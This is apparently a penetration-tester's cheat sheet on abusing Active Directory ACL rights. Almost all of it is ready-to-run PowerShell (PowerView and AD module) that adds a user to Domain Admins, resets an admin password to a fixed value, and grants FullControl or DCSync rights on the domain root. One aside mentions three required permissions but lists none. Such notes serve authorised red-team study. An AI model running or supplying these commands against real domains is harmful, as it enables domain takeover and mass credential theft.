Write-MemberUsing PowerView:
Add-DomainGroupMember -Identity 'Domain Admins' -Members '<user>' –Verbose
Using ActiveDirectory Module:
Add-ADGroupMember-Identity 'Domain Admins' -Members '<user>'
ResetPasswordUsing PowerView:
Set-DomainUserPassword -Identity '<admin_to_change_psw>' –AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) –Verbose
Using ActiveDirectory Module:
Set-ADAccountPassword -Identity '<admin_to_change_psw>' –NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose
FullControl or DCSync on Domain objectFor example, with Domain Admin privileges, the ACL for the domain root can be modified to provide useful rights like FullControl or the ability to run DCSync
<aside> ℹ️ To do DCSync attack it’s not necessary to have FullControl, we can have only these 3 permissions:
</aside>
Add FullControl rights with PowerView:
Add-DomainObjectAcl –TargetIdentity "DC=<domain>,DC=<domain>,DC=<domain>" -PrincipalIdentity '<user>' -Rights All -PrincipalDomain '<FQDN domain>' -TargetDomain '<FQDN domain>' -Verbose
Add only DCSync rights with PowerView:
Add-DomainObjectAcl –TargetIdentity "DC=<domain>,DC=<domain>,DC=<domain>" -PrincipalIdentity '<user>' -Rights DCSync -PrincipalDomain '<FQDN domain>' -TargetDomain '<FQDN domain>' -Verbose
